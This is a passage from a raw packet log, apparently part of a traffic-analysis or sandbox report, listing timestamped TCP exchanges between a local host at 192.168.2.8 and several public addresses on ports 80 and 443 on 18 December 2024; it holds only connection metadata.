Dec 18, 2024 13:38:39.996860027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.996870995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:39.996910095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:39.996925116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.017693996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.017760992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.017930984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.017986059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.018470049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.018522978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.019140959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.019193888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.019438028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.019449949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.019488096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.019500017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.020395041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.020442009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.020910025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.020961046 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.021404028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.021416903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.021449089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.021461964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.022404909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.022474051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.022887945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.022959948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.023397923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.023411036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.023448944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.023461103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.142621040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.142749071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.143009901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.143065929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.143383026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.143435001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.143591881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.143640041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.144155979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.144207001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.144628048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.144639969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.144680023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.145550013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.145598888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.145770073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.145821095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.146239996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.146291018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.146739006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.146750927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.146794081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.147716999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.147768021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.148217916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.148231030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.148272038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.149183035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.149234056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.149691105 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.149703979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.149791956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.150719881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.150732040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.150784016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.151721954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.151734114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.151776075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.152931929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.152944088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.152985096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.153723955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.153737068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.153775930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.154799938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.154813051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.154850960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.155694962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.155706882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.155746937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.156747103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.156759977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.156807899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.157723904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.157737017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.157779932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.158689022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.158700943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.158740044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.158763885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.159780025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.159830093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.160182953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.160196066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.160234928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.161215067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.161242008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.161274910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.161290884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.162440062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.162452936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.162492037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.163497925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.163511038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.163553953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.164649963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.164670944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.164683104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.164700985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.164726973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.166013956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.166027069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.166066885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.167069912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.167083025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.167121887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.168092966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.168104887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.168159008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.168927908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.168940067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.168988943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.169728994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.169742107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.169780970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.170775890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.170788050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.170829058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.171737909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.171750069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.171792030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.172841072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.172883034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.172892094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.172928095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.174137115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.174149990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.174186945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.175056934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.175070047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.175081015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.175110102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.175123930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.176080942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.176101923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.176131964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.176143885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.177251101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.177263975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.177309036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.178281069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.178292990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.178328991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.179482937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.179496050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.179506063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.179534912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.179548979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.180485964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.180499077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.180536985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.181566954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.181621075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:40.209510088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:40.209572077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:42.516556978 CET	49714	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:42.516947985 CET	49720	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:42.550493956 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:42.550582886 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:42.550734997 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:42.604617119 CET	49718	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:42.604636908 CET	443	49718	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:42.636789083 CET	80	49720	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:42.636831999 CET	80	49714	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:42.636888027 CET	49720	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:42.636921883 CET	49714	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:42.684401989 CET	49720	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:42.721443892 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:42.721477985 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:42.721564054 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:42.804080963 CET	80	49720	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:42.873928070 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:42.873950958 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:43.358181953 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:43.358218908 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:43.358285904 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:43.358592033 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:43.358603001 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:44.024873018 CET	80	49720	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:44.025377989 CET	49720	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:44.028023005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:44.028393030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:44.149375916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:44.149527073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:44.150629997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:44.153546095 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:44.153817892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:44.273416996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:44.579864025 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:44.580137014 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:44.581762075 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:44.581775904 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:44.582035065 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:44.585000992 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:44.585184097 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:44.585216999 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:44.585280895 CET	49722	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:44.611124039 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:44.612364054 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:44.612381935 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:44.613455057 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:44.613559961 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:44.615035057 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:44.615109921 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:44.631329060 CET	443	49722	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:44.640810966 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:44.640825033 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:44.681157112 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:44.961613894 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:44.961740971 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:44.961808920 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:44.972976923 CET	49721	443	192.168.2.8	98.85.100.80
Dec 18, 2024 13:38:44.972995996 CET	443	49721	98.85.100.80	192.168.2.8
Dec 18, 2024 13:38:45.499732971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.499794960 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.499941111 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.499954939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.499984026 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.500030994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.500529051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.500541925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.500590086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.500590086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.500910997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.500924110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.500960112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.500979900 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.501539946 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.501553059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.501626015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.502167940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.502249956 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.623447895 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.623536110 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.623709917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.623769045 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.628078938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.628155947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.691435099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.691533089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.691570044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.691638947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.695780993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.695863008 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.695955992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.696006060 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.704314947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.704377890 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.704571962 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.704622984 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.713079929 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.713165998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.713293076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.713370085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.721756935 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.721837997 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.721923113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.721966982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.730535030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.730612993 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.730683088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.730726957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.739366055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.739418030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.739464998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.739522934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.747884035 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.747965097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.748008013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.748049974 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.756527901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.756587029 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.756731987 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.756793976 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.765117884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.765178919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.765283108 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.765366077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.773281097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.773339987 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.773504972 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.773603916 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.780818939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.780885935 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.857321024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.857414961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.857458115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.857541084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.883177042 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.883246899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.883327007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.883404016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.885660887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.885729074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.886590958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.886662006 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.886826992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.886898041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.891153097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.891246080 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.891277075 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.891330957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.895798922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.895859003 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.895967960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.896042109 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.900667906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.900757074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.900789976 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.900827885 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.905307055 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.905394077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.905478001 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.905546904 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.910092115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.910187006 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.910219908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.910326004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.914737940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.914802074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.914990902 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.915055990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.919785976 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.919842005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.919857979 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.919904947 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:45.924515009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:45.924530029 CET	80	49723	31.41.244.11	192.168.2.8
